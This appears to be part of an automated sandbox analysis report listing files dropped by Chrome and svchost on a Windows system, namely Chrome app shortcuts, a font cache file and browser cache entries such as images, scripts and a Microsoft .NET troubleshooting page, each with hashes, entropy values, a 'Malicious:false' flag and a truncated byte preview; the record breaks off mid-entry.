                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2677
                                                                                Entropy (8bit):3.978888079487261
                                                                                Encrypted:false
                                                                                SSDEEP:48:8IdST+yf8H8idAKZdA19ehwiZUklqeh9y+3:8xXfTey
                                                                                MD5:624CE2643F253E7A2D259C2CC78ECC27
                                                                                SHA1:C003FCC245929882599F3A8B9767FE6E317D0EFE
                                                                                SHA-256:ACEB6A6890AA75587536627449C8F2C617D40838E4BB86225963CEB3E03A84C1
                                                                                SHA-512:6120E08A82A48AEFF0707B3438D81183AA78D1AB2CAE36CE80CD355C068AD6489B8899D7C35A0683C9C5A9138237ED7D7327858A051CE285A06E55521FA83139
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.....z..@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2679
                                                                                Entropy (8bit):3.9933194017767932
                                                                                Encrypted:false
                                                                                SSDEEP:48:81dST+yf8H8idAKZdA1weh/iZUkAQkqehOy+2:8aXfh9Qry
                                                                                MD5:56E09D352AF9841463B917146A5C9B20
                                                                                SHA1:0CDF0FB88CA70028C08EA9DF2B24B469F826A049
                                                                                SHA-256:16B7C904E225366E2ABB8F90EA1D2ACCF5A5D8C635E58F58FA9DDC3B982A0829
                                                                                SHA-512:DCB54EBA6E4DD8273C0E1851C302D69FC9BA3F77BCDA0FF060F21124CBB1E83877818AFAA385137530A292EE2B9D4C2F23B28639EAFC125CD3FD4D51B60F9D06
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,........@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2693
                                                                                Entropy (8bit):4.005841917590716
                                                                                Encrypted:false
                                                                                SSDEEP:48:8xndST+yfsH8idAKZdA14tseh7sFiZUkmgqeh7ssy+BX:8xcXfBnKy
                                                                                MD5:6772387A48350623F2AE9FEE900DAAFB
                                                                                SHA1:C549E5606C82829F6EAF9CF7547B3C16436567E1
                                                                                SHA-256:37AB0D901CDB35B0268C50B17F4BC471724CCF491B00377408C131E297579ED6
                                                                                SHA-512:54512A3A60F1CB4D2D287BD0E3CECD838C9FD4D9B7DDF6B65431DCAE9F195E5477AED699405B59AE385BD068D4E90EB7FBA7BABB5F772787C19E64642AFFC8CB
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2681
                                                                                Entropy (8bit):3.992583750694681
                                                                                Encrypted:false
                                                                                SSDEEP:48:80dST+yf8H8idAKZdA1vehDiZUkwqehiy+R:8FXfCky
                                                                                MD5:B13962ECD6F104A082FBD7696569294E
                                                                                SHA1:2DCF81D70A173C1ABD1315F9E28D737632DA6CCA
                                                                                SHA-256:E65E55183B8167917BBCD8C47A961D8B74871A5CB4427224749408EFF328A076
                                                                                SHA-512:5DC179DA5E3EC36C12396D7574C71DC637B5C7FDA6843AE97EC3428A79A79FC933F9EDED0C04557B513270AE562E549F53C188DB83A344353747C6D8FC510396
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.....E..@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2681
                                                                                Entropy (8bit):3.981565231341942
                                                                                Encrypted:false
                                                                                SSDEEP:48:8kXndST+yf8H8idAKZdA1hehBiZUk1W1qehYy+C:8/Xfy94y
                                                                                MD5:EBAD11B0080B762FD2555F03B5E55A96
                                                                                SHA1:9C47C140E62D8BD4DCFCE8E97D2DD8F5ED1DD26A
                                                                                SHA-256:6F9A5130E8AB2B1EFB7D0909E53062FD9B11E5874D616C791FEE6E8B0C630132
                                                                                SHA-512:E17D073327DD620CC69ED370B82A4DBADE614C28273A9E2FE528542AED763A91087214346281664CB3532DF0305BC2A048E025293D2BAD9DF90F8A93B22DA7F0
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,....w~..@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2683
                                                                                Entropy (8bit):3.9900676222627895
                                                                                Encrypted:false
                                                                                SSDEEP:48:8HdST+yf8H8idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbKy+yT+:88XfsT/TbxWOvTbKy7T
                                                                                MD5:C70885A06F0238B683069C083575866F
                                                                                SHA1:D7C44C67C39CFFCB38DEEAA6E2636AD4B642944E
                                                                                SHA-256:CF38F915361FCFDF4D3528841E70CC8A81228E3ADDD17011EB9A78FD47AC3BE5
                                                                                SHA-512:21FFF7F8B0DBB31DD9428D96C33B3101DA3F4B04E96221F4A0A0CE0449F4AAE5C5501708D1928B065CD647CCE4B3C4E954D0B4190D79C4C329FBE5CBD64A87B5
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,........@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                Chrome Cache Entry: 182

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):13339
                                                                                Entropy (8bit):7.683569563478597
                                                                                Encrypted:false
                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

                                                                                Chrome Cache Entry: 183

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):18367
                                                                                Entropy (8bit):7.7772261735974215
                                                                                Encrypted:false
                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

                                                                                Chrome Cache Entry: 184

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):3130
                                                                                Entropy (8bit):4.790069981348324
                                                                                Encrypted:false
                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                Malicious:false
                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

                                                                                Chrome Cache Entry: 185

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):15427
                                                                                Entropy (8bit):7.784472070227724
                                                                                Encrypted:false
                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

                                                                                Chrome Cache Entry: 186

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                Category:dropped
                                                                                Size (bytes):1730619
                                                                                Entropy (8bit):5.505615568287551
                                                                                Encrypted:false
                                                                                SSDEEP:24576:qT7Z3H5dBEhjeaQzyMkinVg8qjC1JcYyOWCzE+0RlCDSB1DkCXWL/Ne2VLE0A96D:qT5H5dBEcDSB1DkCXWLVeuLE0A9CCDa
                                                                                MD5:627F36D1AC50FDA5F78E0A0FC820CCF5
                                                                                SHA1:6962206F8B7B496292205CC0FA6F7620DFD0F64B
                                                                                SHA-256:4AC295B2A0F4EC8169614DAA5A50E719267F85735A1942B13DBD1FAF860FA788
                                                                                SHA-512:1C11E78A5E6B9F0259B2BE495D23403F0A5463C1139ECF39A5D8C3AC40AC0A7E7F903B658180D19FEC6700007A492D5C097A58B0C48E5590F3DE60913F26C42A
                                                                                Malicious:false
                                                                                Preview:"use strict";(()=>{var pfe=Object.create;var Fx=Object.defineProperty;var lO=Object.getOwnPropertyDescriptor;var mfe=Object.getOwnPropertyNames;var gfe=Object.getPrototypeOf,ffe=Object.prototype.hasOwnProperty;var hfe=(e,t,o)=>t in e?Fx(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var bfe=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of mfe(t))!ffe.call(e,r)&&r!==o&&Fx(e,r,{get:()=>t[r],enumerable:!(n=lO(t,r))||n.enumerable});return e};var Ra=(e,t,o)=>(o=e!=null?pfe(gfe(e)):{},bfe(t||!e||!e.__esModule?Fx(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?lO(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&Fx(t,o,r),r};var Ui=(e,t,o)=>(hfe(e,typeof t!="symbol"?t+"":t,o),o),_L=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var St=(e,t,o)=>(_L(e,t,"read from private field"),o?o.call(e):t.get(e)),Uo=(e,t,o)=>{if(t.has(

                                                                                Chrome Cache Entry: 187

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):47758
                                                                                Entropy (8bit):5.04838690819544
                                                                                Encrypted:false
                                                                                SSDEEP:768:6DcScfvwcwOffIYswsuKJmQG1Yn4/1ggM6F5F3MeYUS99o:6YfovOff9swsu+mQGO4/1BzRMhUe9o
                                                                                MD5:E423BF2027B2C3FB2473EBA07418FBD7
                                                                                SHA1:FC948A3A17965742E463BF216827ACCE201D8259
                                                                                SHA-256:5E73EBBEF7F8316C1852C6D78E0FC1D7E862D83E42BD18ED0B62C4B3E67F8E2F
                                                                                SHA-512:B5E2175770396F440D90313E1D040016BAA7BC0C518DFA7825BBF3E088DC899101CC0EF7B28A775DD14E33C50DF4152F86492C62FF9813E91F506F1803E13F42
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Preview:<!DOCTYPE html><html...class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"...lang="en-us"...dir="ltr"...data-authenticated="false"...data-auth-status-determined="false"...data-target="docs"...x-ms-format-detection="none">....<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1.0" />...<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />...<meta property="og:type" content="website" />...<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />.....<meta property="og:image:alt" content="Fix .NET Framework 'This application

                                                                                Chrome Cache Entry: 188

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):16
                                                                                Entropy (8bit):3.875
                                                                                Encrypted:false
                                                                                SSDEEP:3:HMB:k
                                                                                MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                Malicious:false
                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                Preview:CgkKBw2/5iXyGgA=

                                                                                Chrome Cache Entry: 189

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                Category:dropped
                                                                                Size (bytes):207771
                                                                                Entropy (8bit):5.4194316845132855
                                                                                Encrypted:false
                                                                                SSDEEP:3072:hAuzoOXZhSHYBdBthJd3CUMD5P55MekvFjPrYFc1Tb:h/zoV4zfqxXMeCFnYcTb
                                                                                MD5:9F127FCE3746D2B744C944488BB2F2DD
                                                                                SHA1:8EF39E285C9BE04D3A26735A7C738EFABF9E17F0
